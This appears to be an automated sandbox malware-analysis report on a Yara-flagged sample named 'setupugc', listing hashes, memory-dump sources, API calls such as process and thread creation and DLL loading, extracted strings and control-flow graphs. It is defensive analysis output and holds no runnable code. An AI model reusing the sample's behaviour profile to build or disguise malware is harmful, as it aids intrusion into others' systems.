                                            • Opcode ID: a6ff53ee884fe68b785312c38e0a54b37f890f3ef71f22e9b5cccad6a8671064
                                            • Instruction ID: 56ac6f486745a03996a12f392b2e564d48a5113e3ce1844f228ff11bc68b0f26
                                            • Opcode Fuzzy Hash: a6ff53ee884fe68b785312c38e0a54b37f890f3ef71f22e9b5cccad6a8671064
                                            • Instruction Fuzzy Hash: 3090023A20141813D111B1584504707001987D0246F95C462A0428559DA7668A52A121
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4e0d43c4d2c86f2636d7ccda8851fd73a6177975fc292171d9fb2ed2b076eddc
                                            • Instruction ID: 1311a84fcc975e85b4437c046745d4aed2874eea449af20d1170cc3037e0716e
                                            • Opcode Fuzzy Hash: 4e0d43c4d2c86f2636d7ccda8851fd73a6177975fc292171d9fb2ed2b076eddc
                                            • Instruction Fuzzy Hash: EA90022A242455525545F1584404507401697E0246795C062A1418951C96369956D621
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f2db0db756411a530ea46597c9b9418570536909d3a5a1a3ddd0be870d57d269
                                            • Instruction ID: 844c3d8adfc6d4673b8bed97fe84ab92ccbc61ab4947b605e75e64a276217eac
                                            • Opcode Fuzzy Hash: f2db0db756411a530ea46597c9b9418570536909d3a5a1a3ddd0be870d57d269
                                            • Instruction Fuzzy Hash: A690022A30141403D140B15854186064015D7E1306F55D061E0418555CEA2589565222
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 387 3260b6f-3260b78 388 3260bdf-3260bfc 387->388 389 3260b7a-3260b7d 387->389 392 3260c57-3260c5e 388->392 393 3260bfe-3260c05 388->393 390 3260b4f-3260b54 389->390 391 3260b7f-3260b8e 389->391 390->387 391->387 395 3260b90-3260bb6 391->395 394 3260c62 392->394 396 3260c07-3260c09 393->396 397 3260c7a-3260c7f 393->397 398 3260c64 394->398 399 3260ce1-3260d1f call 327b410 call 327be20 call 3264470 call 3251420 394->399 402 3260c1b 395->402 403 3260bb8-3260bdc 395->403 404 3260c0a-3260c11 396->404 400 3260c81-3260c9b 397->400 401 3260c9d-3260cae 397->401 398->404 406 3260c67-3260c78 398->406 407 3260d23-3260d4a call 3271b50 399->407 400->401 401->407 408 3260cb0-3260cb7 401->408 403->388 404->394 405 3260c13-3260c17 404->405 405->402 406->397 418 3260d4c-3260d5b PostThreadMessageW 407->418 419 3260d6a-3260d70 407->419 408->399 418->419 421 3260d5d-3260d67 418->421 421->419
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 3h8t0-08$3h8t0-08$a~V
                                            • API String ID: 0-2215303234

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 03260D57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: 3h8t0-08$3h8t0-08
                                            • API String ID: 1836367815-1947605396

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 597 3260cdc-3260d5b PostThreadMessageW 599 3260d5d-3260d67 597->599 600 3260d6a-3260d70 597->600 599->600
                                            APIs
                                            • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 03260D57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: 3h8t0-08$3h8t0-08
                                            • API String ID: 1836367815-1947605396
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 03273AAB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0326F457
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Initialize
                                            • String ID: @J7<
                                            • API String ID: 2538663250-2016760708
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0326F457
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Initialize
                                            • String ID: @J7<
                                            • API String ID: 2538663250-2016760708
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032644E2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,0326826E,00000010,?,?,?,00000044,?,00000010,0326826E,?,?,?), ref: 03279723
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03259BE5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032644E2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03259BE5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,03263CF2,000000F4), ref: 0327966C
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            APIs
                                            • RtlAllocateHeap.NTDLL(03261979,?,0327571B,03261979,032755AF,0327571B,?,03261979,032755AF,00001000,?,?,00000000), ref: 0327961F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?), ref: 032682DC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?), ref: 032682DC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,03261C60,03277EEF,032755AF,03261C30), ref: 032680D3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,03261C60,03277EEF,032755AF,03261C30), ref: 032680D3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?), ref: 032682DC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3553899335.0000000003970000.00000040.00000800.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3970000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                            • API String ID: 0-3558027158
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3553899335.0000000003970000.00000040.00000800.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3970000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$9~b{$<9<-$bsnb$b{z=$g+&8$g+&8$n{z-$n{z:$qs9a$stf:$wffz$wqs9$x9n~$z:wf
                                            • API String ID: 0-3228068659
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            Strings
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03BF4725
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03BF4655
                                            • ExecuteOptions, xrefs: 03BF46A0
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03BF4742
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03BF46FC
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03BF4787
                                            • Execute=1, xrefs: 03BF4713
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 03BF031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03BF02BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03BF02E7
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            Strings
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03BF7B7F
                                            • RTL: Re-Waiting, xrefs: 03BF7BAC
                                            • RTL: Resource at %p, xrefs: 03BF7B8E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03BF728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 03BF72C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03BF7294
                                            • RTL: Resource at %p, xrefs: 03BF72A3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280